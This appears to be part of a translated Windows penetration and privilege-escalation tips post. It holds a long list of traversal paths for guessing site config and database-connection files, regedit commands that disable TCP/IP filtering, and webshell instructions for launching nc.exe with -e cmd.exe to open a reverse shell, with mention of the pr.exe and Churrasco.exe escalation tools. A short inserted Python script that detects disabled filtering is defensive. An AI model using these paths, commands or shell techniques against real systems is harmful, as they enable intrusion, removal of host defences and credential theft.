./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/index.php
./index.php
../../index.php
../index.php
../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp
Removing TCP/IP filtering:
TCP/IP filtering appears in three places in the registry:
```text
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
```
Export each of the three keys with the following commands:
```batch
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
```
Then in all three files change:
```text
"EnableSecurityFilters"=dword:00000001
```
to:
```text
"EnableSecurityFilters"=dword:00000000
```
Finally import the three files back into the registry with the following commands:
```batch
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
```
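As an added defender-side example (not from the original post) covering this section and item "a" of the 3389 section above, the Python below parses exported .reg files and reports every Tcpip\Parameters key whose EnableSecurityFilters value has been switched to 0. The two .reg samples are constructed.

```python
import re

# Constructed samples of the exported .reg files (not real host data): b.reg still has
# filtering on, c.reg has already been changed to dword:00000000.
SAMPLE_B_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip]

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001
"DataBasePath"="%SystemRoot%\\System32\\drivers\\etc"
"""

SAMPLE_C_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000000
"""

SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})\s*$')


def parse_reg_dwords(text):
    """Return {key_path: {value_name: int}} for the DWORD values in a .reg file."""
    tree, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            tree[current][m.group(1)] = int(m.group(2), 16)
    return tree


def filter_states(reg_texts):
    """Map each key found in the given .reg contents that carries EnableSecurityFilters
    to its value (1 = filtering on, 0 = off)."""
    states = {}
    for text in reg_texts:
        for key, values in parse_reg_dwords(text).items():
            if "EnableSecurityFilters" in values:
                states[key] = values["EnableSecurityFilters"]
    return states


def filtering_disabled(reg_texts):
    """Keys whose EnableSecurityFilters has been switched to 0, sorted."""
    return sorted(k for k, v in filter_states(reg_texts).items() if v == 0)


def read_reg_file(path):
    """regedit 5 exports UTF-16 with a BOM; older REGEDIT4 files are ANSI (latin-1 assumed here)."""
    with open(path, "rb") as fh:
        raw = fh.read()
    return raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("latin-1")


if __name__ == "__main__":
    print("filter states:", filter_states([SAMPLE_B_REG, SAMPLE_C_REG]))
    print("filtering disabled in:", filtering_disabled([SAMPLE_B_REG, SAMPLE_C_REG]))
```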
Small webshell privilege-escalation tips:
Cmd path:
```text
c:\windows\temp\cmd.exe
```
Nc is in the same directory; for example, a reverse cmd shell:
```text
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
```
usually does not succeed.
But entering in the cmd-path field:
```text
c:\windows\temp\nc.exe
```
and in the command field:
```text
-vv ip 999 -e c:\windows\temp\cmd.exe
```
does succeed. That is not the main point, though:
when we run pr.exe or Churrasco.exe we usually also need to follow the method above for them to succeed.
Having read the Windows version, don't miss the Linux one: 《Linux渗透与提权:技巧总结篇》 (Linux Penetration and Privilege Escalation: Tips Summary).
[via @0x / t00ls / lcx]
Copyright © hongdaChiaki (鸿大千秋). All Rights Reserved.